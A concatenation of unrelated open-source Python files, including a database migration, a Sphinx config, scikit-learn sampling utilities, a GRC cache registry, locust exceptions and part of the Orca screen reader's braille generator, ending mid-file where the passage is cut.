alphagov/digitalmarketplace-api | refs/heads/dependabot/pip/digitalmarketplace-apiclient-22.2.0 | migrations/versions/840_add_application_close_date_for_framework.py | 1 | """Add `application_close_date` for Framework
Revision ID: 840
Revises: 830
Create Date: 2017-02-06 11:09:26.852142
"""
from alembic import op
from datetime import datetime
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '840'
down_revision = '830'
frameworks_table = sa.table(
'frameworks',
sa.Column('id', sa.Integer, primary_key=True),
sa.Column('slug', sa.String, nullable=False, unique=True, index=True),
sa.Column('allow_declaration_reuse', sa.Boolean),
sa.Column('application_close_date', sa.DateTime)
)
def upgrade():
op.add_column('frameworks', sa.Column('application_close_date', sa.DateTime(), nullable=True))
op.add_column(
'frameworks',
sa.Column('allow_declaration_reuse', sa.Boolean(), nullable=False, server_default='false')
)
fields = ('slug', 'application_close_date', 'allow_declaration_reuse')
new_values = (
('digital-outcomes-and-specialists', datetime(2016, 1, 1, 15), True),
('digital-outcomes-and-specialists-2', datetime(2017, 1, 16, 17), True),
('g-cloud-8', datetime(2016, 6, 1, 17), True),
)
new_values = [dict(zip(fields, i)) for i in new_values]
for i in new_values:
op.execute(
frameworks_table.update().where(frameworks_table.c.slug==i.pop('slug')).values(**i)
)
def downgrade():
op.drop_column('frameworks', 'allow_declaration_reuse')
op.drop_column('frameworks', 'application_close_date')
|
captainsafia/agate | refs/heads/master | docs/conf.py | 1 | # -*- coding: utf-8 -*-
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('..'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.intersphinx']
autodoc_member_order = 'bysource'
intersphinx_mapping = {
'python': ('http://docs.python.org/2.7', None)
}
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'agate'
copyright = u'2015, Christopher Groskopf'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.7.0'
# The full version, including alpha/beta/rc tags.
release = '0.7.0 (alpha)'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if not on_rtd: # only import and set the theme if we're building docs locally
import sphinx_rtd_theme
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'agatedoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'agate.tex', u'agate Documentation',
u'Christopher Groskopf', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
]
|
LubyRuffy/spiderfoot | refs/heads/master | ext/stem/util/__init__.py | 13 | # Copyright 2011-2015, Damian Johnson and The Tor Project
# See LICENSE for licensing information
"""
Utility functions used by the stem library.
"""
__all__ = [
'conf',
'connection',
'enum',
'log',
'lru_cache',
'ordereddict',
'proc',
'system',
'term',
'test_tools',
'tor_tools',
]
|
rexshihaoren/scikit-learn | refs/heads/master | sklearn/utils/random.py | 234 | # Author: Hamzeh Alsalhi <ha258@cornell.edu>
#
# License: BSD 3 clause
from __future__ import division
import numpy as np
import scipy.sparse as sp
import operator
import array
from sklearn.utils import check_random_state
from sklearn.utils.fixes import astype
from ._random import sample_without_replacement
__all__ = ['sample_without_replacement', 'choice']
# This is a backport of np.random.choice from numpy 1.7
# The function can be removed when we bump the requirements to >=1.7
def choice(a, size=None, replace=True, p=None, random_state=None):
"""
choice(a, size=None, replace=True, p=None)
Generates a random sample from a given 1-D array
.. versionadded:: 1.7.0
Parameters
-----------
a : 1-D array-like or int
If an ndarray, a random sample is generated from its elements.
If an int, the random sample is generated as if a was np.arange(n)
size : int or tuple of ints, optional
Output shape. Default is None, in which case a single value is
returned.
replace : boolean, optional
Whether the sample is with or without replacement.
p : 1-D array-like, optional
The probabilities associated with each entry in a.
If not given the sample assumes a uniform distribtion over all
entries in a.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
Returns
--------
samples : 1-D ndarray, shape (size,)
The generated random samples
Raises
-------
ValueError
If a is an int and less than zero, if a or p are not 1-dimensional,
if a is an array-like of size 0, if p is not a vector of
probabilities, if a and p have different lengths, or if
replace=False and the sample size is greater than the population
size
See Also
---------
randint, shuffle, permutation
Examples
---------
Generate a uniform random sample from np.arange(5) of size 3:
>>> np.random.choice(5, 3) # doctest: +SKIP
array([0, 3, 4])
>>> #This is equivalent to np.random.randint(0,5,3)
Generate a non-uniform random sample from np.arange(5) of size 3:
>>> np.random.choice(5, 3, p=[0.1, 0, 0.3, 0.6, 0]) # doctest: +SKIP
array([3, 3, 0])
Generate a uniform random sample from np.arange(5) of size 3 without
replacement:
>>> np.random.choice(5, 3, replace=False) # doctest: +SKIP
array([3,1,0])
>>> #This is equivalent to np.random.shuffle(np.arange(5))[:3]
Generate a non-uniform random sample from np.arange(5) of size
3 without replacement:
>>> np.random.choice(5, 3, replace=False, p=[0.1, 0, 0.3, 0.6, 0])
... # doctest: +SKIP
array([2, 3, 0])
Any of the above can be repeated with an arbitrary array-like
instead of just integers. For instance:
>>> aa_milne_arr = ['pooh', 'rabbit', 'piglet', 'Christopher']
>>> np.random.choice(aa_milne_arr, 5, p=[0.5, 0.1, 0.1, 0.3])
... # doctest: +SKIP
array(['pooh', 'pooh', 'pooh', 'Christopher', 'piglet'],
dtype='|S11')
"""
random_state = check_random_state(random_state)
# Format and Verify input
a = np.array(a, copy=False)
if a.ndim == 0:
try:
# __index__ must return an integer by python rules.
pop_size = operator.index(a.item())
except TypeError:
raise ValueError("a must be 1-dimensional or an integer")
if pop_size <= 0:
raise ValueError("a must be greater than 0")
elif a.ndim != 1:
raise ValueError("a must be 1-dimensional")
else:
pop_size = a.shape[0]
if pop_size is 0:
raise ValueError("a must be non-empty")
if None != p:
p = np.array(p, dtype=np.double, ndmin=1, copy=False)
if p.ndim != 1:
raise ValueError("p must be 1-dimensional")
if p.size != pop_size:
raise ValueError("a and p must have same size")
if np.any(p < 0):
raise ValueError("probabilities are not non-negative")
if not np.allclose(p.sum(), 1):
raise ValueError("probabilities do not sum to 1")
shape = size
if shape is not None:
size = np.prod(shape, dtype=np.intp)
else:
size = 1
# Actual sampling
if replace:
if None != p:
cdf = p.cumsum()
cdf /= cdf[-1]
uniform_samples = random_state.random_sample(shape)
idx = cdf.searchsorted(uniform_samples, side='right')
# searchsorted returns a scalar
idx = np.array(idx, copy=False)
else:
idx = random_state.randint(0, pop_size, size=shape)
else:
if size > pop_size:
raise ValueError("Cannot take a larger sample than "
"population when 'replace=False'")
if None != p:
if np.sum(p > 0) < size:
raise ValueError("Fewer non-zero entries in p than size")
n_uniq = 0
p = p.copy()
found = np.zeros(shape, dtype=np.int)
flat_found = found.ravel()
while n_uniq < size:
x = random_state.rand(size - n_uniq)
if n_uniq > 0:
p[flat_found[0:n_uniq]] = 0
cdf = np.cumsum(p)
cdf /= cdf[-1]
new = cdf.searchsorted(x, side='right')
_, unique_indices = np.unique(new, return_index=True)
unique_indices.sort()
new = new.take(unique_indices)
flat_found[n_uniq:n_uniq + new.size] = new
n_uniq += new.size
idx = found
else:
idx = random_state.permutation(pop_size)[:size]
if shape is not None:
idx.shape = shape
if shape is None and isinstance(idx, np.ndarray):
# In most cases a scalar will have been made an array
idx = idx.item(0)
# Use samples as indices for a if a is array-like
if a.ndim == 0:
return idx
if shape is not None and idx.ndim == 0:
# If size == () then the user requested a 0-d array as opposed to
# a scalar object when size is None. However a[idx] is always a
# scalar and not an array. So this makes sure the result is an
# array, taking into account that np.array(item) may not work
# for object arrays.
res = np.empty((), dtype=a.dtype)
res[()] = a[idx]
return res
return a[idx]
def random_choice_csc(n_samples, classes, class_probability=None,
random_state=None):
"""Generate a sparse random matrix given column class distributions
Parameters
----------
n_samples : int,
Number of samples to draw in each column.
classes : list of size n_outputs of arrays of size (n_classes,)
List of classes for each column.
class_probability : list of size n_outputs of arrays of size (n_classes,)
Optional (default=None). Class distribution of each column. If None the
uniform distribution is assumed.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
Returns
-------
random_matrix : sparse csc matrix of size (n_samples, n_outputs)
"""
data = array.array('i')
indices = array.array('i')
indptr = array.array('i', [0])
for j in range(len(classes)):
classes[j] = np.asarray(classes[j])
if classes[j].dtype.kind != 'i':
raise ValueError("class dtype %s is not supported" %
classes[j].dtype)
classes[j] = astype(classes[j], np.int64, copy=False)
# use uniform distribution if no class_probability is given
if class_probability is None:
class_prob_j = np.empty(shape=classes[j].shape[0])
class_prob_j.fill(1 / classes[j].shape[0])
else:
class_prob_j = np.asarray(class_probability[j])
if np.sum(class_prob_j) != 1.0:
raise ValueError("Probability array at index {0} does not sum to "
"one".format(j))
if class_prob_j.shape[0] != classes[j].shape[0]:
raise ValueError("classes[{0}] (length {1}) and "
"class_probability[{0}] (length {2}) have "
"different length.".format(j,
classes[j].shape[0],
class_prob_j.shape[0]))
# If 0 is not present in the classes insert it with a probability 0.0
if 0 not in classes[j]:
classes[j] = np.insert(classes[j], 0, 0)
class_prob_j = np.insert(class_prob_j, 0, 0.0)
# If there are nonzero classes choose randomly using class_probability
rng = check_random_state(random_state)
if classes[j].shape[0] > 1:
p_nonzero = 1 - class_prob_j[classes[j] == 0]
nnz = int(n_samples * p_nonzero)
ind_sample = sample_without_replacement(n_population=n_samples,
n_samples=nnz,
random_state=random_state)
indices.extend(ind_sample)
# Normalize probabilites for the nonzero elements
classes_j_nonzero = classes[j] != 0
class_probability_nz = class_prob_j[classes_j_nonzero]
class_probability_nz_norm = (class_probability_nz /
np.sum(class_probability_nz))
classes_ind = np.searchsorted(class_probability_nz_norm.cumsum(),
rng.rand(nnz))
data.extend(classes[j][classes_j_nonzero][classes_ind])
indptr.append(len(indices))
return sp.csc_matrix((data, indices, indptr),
(n_samples, len(classes)),
dtype=int)
|
edofic/ggrc-core | refs/heads/develop | src/ggrc/cache/cache.py | 3 | # Copyright (C) 2016 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
from collections import namedtuple
CacheEntry = namedtuple('CacheEntry', 'model_plural class_name cache_type')
MappingEntry = namedtuple('MappingEntry', 'class_name attr polymorph')
def resource(model_plural, class_name, cache_type='memcache'):
return CacheEntry(model_plural, class_name, cache_type)
def mapping(class_name, attr, polymorph=False):
return MappingEntry(class_name, attr, polymorph)
def all_cache_entries():
ret = [
resource('access_groups', 'AccessGroup'),
resource('audits', 'Audit'),
resource('custom_attribute_values', 'CustomAttributeValue'),
resource('categorizations', 'Categorization'),
resource('category_bases', 'CategoryBase'),
resource('comments', 'Comment'),
resource('control_categories', 'ControlCategory'),
resource('control_assertions', 'ControlAssertion'),
resource('contexts', 'Context'),
resource('controls', 'Control'),
resource('assessments', 'Assessments'),
resource('assessment_templates', 'AssessmentTemplate'),
resource('data_assets', 'DataAsset'),
resource('directives', 'Directive'),
resource('contracts', 'Contract'),
resource('policies', 'Policy'),
resource('regulations', 'Regulation'),
resource('standards', 'Standard'),
resource('documents', 'Document'),
resource('events', 'Event'),
resource('facilities', 'Facility'),
resource('helps', 'Help'),
resource('markets', 'Market'),
resource('meetings', 'Meeting'),
resource('object_documents', 'ObjectDocument'),
resource('object_owners', 'ObjectOwner'),
resource('object_people', 'ObjectPerson'),
resource('objectives', 'Objective'),
resource('options', 'Option'),
resource('org_groups', 'OrgGroup'),
resource('vendors', 'Vendor'),
resource('people', 'Person'),
resource('products', 'Product'),
resource('projects', 'Project'),
resource('programs', 'Program'),
resource('relationships', 'Relationship'),
resource('requests', 'Request'),
resource('revisions', 'Revision'),
resource('sections', 'Section'),
resource('clauses', 'Clause'),
resource('systems_or_processes', 'SystemOrProcess'),
resource('systems', 'System'),
resource('processes', 'Process'),
resource('issues', 'Issue'),
# ggrc notification models
resource('notification_configs', 'NotificationConfig'),
resource('notifications', 'Notification'),
resource('notification_type', 'NotificationType'),
# ggrc custom attribuess
resource('custom_attribute_definitions', 'CustomAttributeDefinition'),
resource('custom_attribute_values', 'CustomAttributeValue'),
# FIXME: Extension-defined models should be registered
# from the extensions.
# ggrc_basic_permissions models
resource('roles', 'Role'),
resource('user_roles', 'UserRole'),
# ggrc_gdrive_integration models
resource('object_folders', 'ObjectFolder'),
resource('object_files', 'ObjectFile'),
resource('object_events', 'ObjectEvent'),
# ggrc_risk_assessments models
resource('templates', 'Template'),
resource('risk_assessments', 'RiskAssessment'),
resource('risk_assessment_mappings', 'RiskAssessmentMapping'),
resource('risk_assessment_control_mappings',
'RiskAssessmentControlMapping'),
resource('threats', 'Threat'),
resource('vulnerabilities', 'Vulnerability'),
# ggrc_workflows models
resource('cycle_task_entries', 'CycleTaskEntry'),
resource('cycle_task_group_object_tasks', 'CycleTaskGroupObjectTask'),
resource('cycle_task_groups', 'CycleTaskGroup'),
resource('cycles', 'Cycle'),
resource('task_group_objects', 'TaskGroupObject'),
resource('task_group_tasks', 'TaskGroupTask'),
resource('task_groups', 'TaskGroup'),
resource('workflow_people', 'WorkflowPerson'),
resource('workflows', 'Workflow'),
]
return ret
def all_mapping_entries():
ret = [
mapping('Audit', 'requests'),
mapping('Audit', 'program'),
mapping('Request', 'audit'),
mapping('CustomAttributeValue', 'attributable', True),
mapping('Request', 'responses'),
mapping('ObjectDocument', 'document'),
mapping('ObjectDocument', 'documentable', True),
mapping('ObjectOwner', 'person'),
mapping('ObjectOwner', 'ownable', True),
mapping('ObjectPerson', 'person'),
mapping('ObjectPerson', 'personable', True),
mapping('Section', 'directive'), # this goes out?
mapping('Relationship', 'source', True),
mapping('Relationship', 'destination', True),
mapping('UserRole', 'context'),
mapping('UserRole', 'person'),
mapping('UserRole', 'role'),
mapping('ObjectEvent', 'eventable', True),
mapping('ObjectFolder', 'folderable', True),
mapping('ObjectFile', 'fileable', True),
mapping('Notification', 'recipients'),
mapping('Notification', 'notification_object'),
# ggrc_workflows mappings:
mapping('TaskGroupObject', 'object', True),
mapping('TaskGroupObject', 'task_group'),
mapping('TaskGroupTask', 'task_group'),
mapping('TaskGroup', 'workflow'),
mapping('WorkflowPerson', 'context'),
mapping('WorkflowPerson', 'person'),
mapping('WorkflowPerson', 'workflow'),
mapping('Cycle', 'workflow'),
mapping('Cycle', 'cycle_task_groups'),
mapping('CycleTaskGroup', 'cycle'),
mapping('CycleTaskGroup', 'task_group'),
mapping('CycleTaskGroupObjectTask', 'cycle'),
mapping('CycleTaskGroupObjectTask', 'cycle_task_entries'),
mapping('CycleTaskGroupObjectTask', 'task_group_task'),
mapping('CycleTaskGroupObjectTask', 'cycle_task_objects_for_cache'),
mapping('CycleTaskEntry', 'cycle'),
mapping('CycleTaskEntry', 'cycle_task_group_object_task'),
# mapping('RiskAssessmentMapping'),
# mapping('RiskAssessmentControlMapping'),
]
return ret
class Cache:
name = None
supported_resources = {}
def __init__(self):
pass
def get_name(self):
return None
def get(self, *_):
return None
def add(self, *_):
return None
def update(self, *_):
return None
def remove(self, *_):
return None
def get_multi(self, *_):
return None
def add_multi(self, *_):
return None
def update_multi(self, *_):
return None
def remove_multi(self, *_):
return None
def clean(self):
return False
def get_key(self, category, resource):
cache_key = category + ":" + resource
return cache_key
def parse_filter(self, filter):
return filter.get('ids'), filter.get('attrs')
def is_caching_supported(self, category, resource):
if category is 'collection':
return resource in self.supported_resources
else:
return False
|
yangchaogit/locust | refs/heads/master | locust/exception.py | 45 | class LocustError(Exception):
pass
class ResponseError(Exception):
pass
class CatchResponseError(Exception):
pass
class InterruptTaskSet(Exception):
"""
Exception that will interrupt a Locust when thrown inside a task
"""
def __init__(self, reschedule=True):
"""
If *reschedule* is True and the InterruptTaskSet is raised inside a nested TaskSet,
the parent TaskSet whould immediately reschedule another task.
"""
self.reschedule = reschedule
class StopLocust(Exception):
pass
class RescheduleTask(Exception):
"""
When raised in a task it's equivalent of a return statement.
Used internally by TaskSet. When raised within the task control flow of a TaskSet,
but not inside a task, the execution should be handed over to the parent TaskSet.
"""
class RescheduleTaskImmediately(Exception):
"""
When raised in a Locust task, another locust task will be rescheduled immediately
"""
|
GNOME/orca | refs/heads/master | src/orca/braille_generator.py | 1 | # Orca
#
# Copyright 2005-2009 Sun Microsystems Inc.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., Franklin Street, Fifth Floor,
# Boston MA 02110-1301 USA.
"""Utilities for obtaining braille presentations for objects."""
__id__ = "$Id$"
__version__ = "$Revision$"
__date__ = "$Date$"
__copyright__ = "Copyright (c) 2005-2009 Sun Microsystems Inc."
__license__ = "LGPL"
import pyatspi
from . import braille
from . import debug
from . import generator
from . import messages
from . import object_properties
from . import orca_state
from . import settings
from . import settings_manager
from .braille_rolenames import shortRoleNames
_settingsManager = settings_manager.getManager()
class Space:
"""A dummy class to indicate we want to insert a space into an
utterance, but only if there is text prior to the space."""
def __init__(self, delimiter=" "):
self.delimiter = delimiter
SPACE = [Space()]
class BrailleGenerator(generator.Generator):
"""Takes accessible objects and produces a list of braille Regions
for those objects. See the generateBraille method, which is the
primary entry point. Subclasses can feel free to override/extend
the brailleGenerators instance field as they see fit."""
SKIP_CONTEXT_ROLES = (pyatspi.ROLE_MENU,
pyatspi.ROLE_MENU_BAR,
pyatspi.ROLE_PAGE_TAB_LIST,
pyatspi.ROLE_REDUNDANT_OBJECT,
pyatspi.ROLE_UNKNOWN,
pyatspi.ROLE_COMBO_BOX)
def __init__(self, script):
generator.Generator.__init__(self, script, "braille")
def _addGlobals(self, globalsDict):
"""Other things to make available from the formatting string.
"""
generator.Generator._addGlobals(self, globalsDict)
globalsDict['space'] = self.space
globalsDict['Component'] = braille.Component
globalsDict['Region'] = braille.Region
globalsDict['Text'] = braille.Text
globalsDict['Link'] = braille.Link
globalsDict['asString'] = self.asString
def _isCandidateFocusedRegion(self, obj, region):
if not isinstance(region, (braille.Component, braille.Text)):
return False
try:
sameRole = obj.getRole() == region.accessible.getRole()
sameName = obj.name == region.accessible.name
except:
msg = 'ERROR: Could not get names, roles for %s, %s' % (obj, region.accessible)
debug.println(debug.LEVEL_INFO, msg)
return False
return sameRole and sameName
def generateBraille(self, obj, **args):
if not _settingsManager.getSetting('enableBraille') \
and not _settingsManager.getSetting('enableBrailleMonitor'):
debug.println(debug.LEVEL_INFO, "BRAILLE: generation disabled")
return [[], None]
if obj == orca_state.locusOfFocus \
and not args.get('formatType', None):
args['formatType'] = 'focused'
result = self.generate(obj, **args)
# We guess at the focused region. It's going to be a
# Component or Text region whose accessible is the same
# as the object we're generating braille for. There is
# a small hack-like thing here where we include knowledge
# that we represent the text area of editable comboboxes
# instead of the combobox itself. We also do the same
# for table cells because they sometimes have children
# that we present.
#
try:
focusedRegion = result[0]
except:
focusedRegion = None
try:
role = obj.getRole()
except:
role = None
for region in result:
if isinstance(region, (braille.Component, braille.Text)) \
and self._script.utilities.isSameObject(region.accessible, obj, True):
focusedRegion = region
break
elif isinstance(region, braille.Text) \
and role == pyatspi.ROLE_COMBO_BOX \
and region.accessible.parent == obj:
focusedRegion = region
break
elif isinstance(region, braille.Component) \
and role == pyatspi.ROLE_TABLE_CELL \
and region.accessible.parent == obj:
focusedRegion = region
break
else:
candidates = list(filter(lambda x: self._isCandidateFocusedRegion(obj, x), result))
msg = 'INFO: Could not determine focused region. Candidates: %i' % len(candidates)
debug.println(debug.LEVEL_INFO, msg)
if len(candidates) == 1:
focusedRegion = candidates[0]
return [result, focusedRegion]
#####################################################################
# #
# Name, role, and label information #
# #
#####################################################################
def _generateRoleName(self, obj, **args):
"""Returns the role name for the object in an array of strings, with
the exception that the pyatspi.ROLE_UNKNOWN role will yield an
empty array. Note that a 'role' attribute in args will
override the accessible role of the obj.
"""
if args.get('isProgressBarUpdate') \
and not _settingsManager.getSetting('brailleProgressBarUpdates'):
return []
result = []
role = args.get('role', obj.getRole())
verbosityLevel = _settingsManager.getSetting('brailleVerbosityLevel')
doNotPresent = [pyatspi.ROLE_UNKNOWN,
pyatspi.ROLE_REDUNDANT_OBJECT,
pyatspi.ROLE_FILLER,
pyatspi.ROLE_EXTENDED,
pyatspi.ROLE_LINK]
# egg-list-box, e.g. privacy panel in gnome-control-center
if obj.parent and obj.parent.getRole() == pyatspi.ROLE_LIST_BOX:
doNotPresent.append(obj.getRole())
if verbosityLevel == settings.VERBOSITY_LEVEL_BRIEF:
doNotPresent.extend([pyatspi.ROLE_ICON, pyatspi.ROLE_CANVAS])
if role == pyatspi.ROLE_HEADING:
level = self._script.utilities.headingLevel(obj)
result.append(object_properties.ROLE_HEADING_LEVEL_BRAILLE % level)
elif verbosityLevel == settings.VERBOSITY_LEVEL_VERBOSE \
and not args.get('readingRow', False) and role not in doNotPresent:
result.append(self.getLocalizedRoleName(obj, **args))
return result
def getLocalizedRoleName(self, obj, **args):
"""Returns the localized name of the given Accessible object; the name
is suitable to be brailled.
Arguments:
- obj: an Accessible object
"""
if _settingsManager.getSetting('brailleRolenameStyle') \
== settings.BRAILLE_ROLENAME_STYLE_SHORT:
role = args.get('role', obj.getRole())
rv = shortRoleNames.get(role)
if rv:
return rv
return super().getLocalizedRoleName(obj, **args)
def _generateUnrelatedLabels(self, obj, **args):
result = []
labels = self._script.utilities.unrelatedLabels(obj)
for label in labels:
name = self._generateName(label, **args)
result.extend(name)
return result
#####################################################################
# #
# Keyboard shortcut information #
# #
#####################################################################
def _generateAccelerator(self, obj, **args):
"""Returns an array of strings (and possibly voice and audio
specifications) that represent the accelerator for the object,
or an empty array if no accelerator can be found.
"""
verbosityLevel = _settingsManager.getSetting('brailleVerbosityLevel')
if verbosityLevel == settings.VERBOSITY_LEVEL_BRIEF:
return []
result = []
[mnemonic, shortcut, accelerator] = \
self._script.utilities.mnemonicShortcutAccelerator(obj)
if accelerator:
result.append("(" + accelerator + ")")
return result
#####################################################################
# #
# Hierarchy and related dialog information #
# #
#####################################################################
def _generateAlertAndDialogCount(self, obj, **args):
"""Returns an array of strings that says how many alerts and dialogs
are associated with the application for this object. [[[WDW -
I wonder if this string should be moved to settings.py.]]]
"""
result = []
try:
alertAndDialogCount = \
self._script.utilities.unfocusedAlertAndDialogCount(obj)
except:
alertAndDialogCount = 0
if alertAndDialogCount > 0:
result.append(messages.dialogCountBraille(alertAndDialogCount))
return result
def _generateAncestors(self, obj, **args):
"""Returns an array of strings (and possibly voice and audio
specifications) that represent the text of the ancestors for
the object. This is typically used to present the context for
an object (e.g., the names of the window, the panels, etc.,
that the object is contained in). If the 'priorObj' attribute
of the args dictionary is set, only the differences in
ancestry between the 'priorObj' and the current obj will be
computed. The 'priorObj' is typically set by Orca to be the
previous object with focus.
"""
result = []
if not _settingsManager.getSetting('enableBrailleContext'):
return result
args['includeContext'] = False
# Radio button group names are treated separately from the
# ancestors. However, they can appear in the ancestry as a
# labeled panel. So, we need to exclude the first one of
# these things we come across. See also the
# generator.py:_generateRadioButtonGroup method that is
# used to find the radio button group name.
#
role = args.get('role', obj.getRole())
excludeRadioButtonGroup = role == pyatspi.ROLE_RADIO_BUTTON
parent = obj.parent
if parent and (parent.getRole() in self.SKIP_CONTEXT_ROLES):
parent = parent.parent
while parent and (parent.parent != parent):
parentResult = []
# [[[TODO: WDW - we might want to include more things here
# besides just those things that have labels. For example,
# page tab lists might be a nice thing to include. Logged
# as bugzilla bug 319751.]]]
#
try:
role = parent.getRole()
except:
role = None
if role and role != pyatspi.ROLE_FILLER \
and role != pyatspi.ROLE_SECTION \
and role != pyatspi.ROLE_SPLIT_PANE \
and role != pyatspi.ROLE_DESKTOP_FRAME \
and not self._script.utilities.isLayoutOnly(parent):
args['role'] = role
parentResult = self.generate(parent, **args)
# [[[TODO: HACK - we've discovered oddness in hierarchies
# such as the gedit Edit->Preferences dialog. In this
# dialog, we have labeled groupings of objects. The
# grouping is done via a FILLER with two children - one
# child is the overall label, and the other is the
# container for the grouped objects. When we detect this,
# we add the label to the overall context.]]]
#
if role in [pyatspi.ROLE_FILLER, pyatspi.ROLE_PANEL]:
label = self._script.utilities.displayedLabel(parent)
if label and len(label) and not label.isspace():
if not excludeRadioButtonGroup:
args['role'] = parent.getRole()
parentResult = self.generate(parent, **args)
else:
excludeRadioButtonGroup = False
if result and parentResult:
result.append(braille.Region(" "))
result.extend(parentResult)
if role == pyatspi.ROLE_EMBEDDED:
break
parent = parent.parent
result.reverse()
return result
def _generateFocusedItem(self, obj, **args):
result = []
role = args.get('role', obj.getRole())
if role not in [pyatspi.ROLE_LIST, pyatspi.ROLE_LIST_BOX]:
return result
if 'Selection' in pyatspi.listInterfaces(obj):
items = self._script.utilities.selectedChildren(obj)
else:
items = [self._script.utilities.focusedChild(obj)]
if not (items and items[0]):
return result
for item in map(self._generateName, items):
result.extend(item)
return result
def _generateStatusBar(self, obj, **args):
statusBar = self._script.utilities.statusBar(obj)
if not statusBar:
return []
items = self._script.utilities.statusBarItems(obj)
if not items or items == [statusBar]:
return []
result = []
for child in items:
childResult = self.generate(child, includeContext=False)
if childResult:
result.extend(childResult)
result.append(braille.Region(" "))
return result
def _generateListBoxItemWidgets(self, obj, **args):
widgetRoles = [pyatspi.ROLE_CHECK_BOX,
pyatspi.ROLE_COMBO_BOX,
pyatspi.ROLE_PUSH_BUTTON,
pyatspi.ROLE_RADIO_BUTTON,
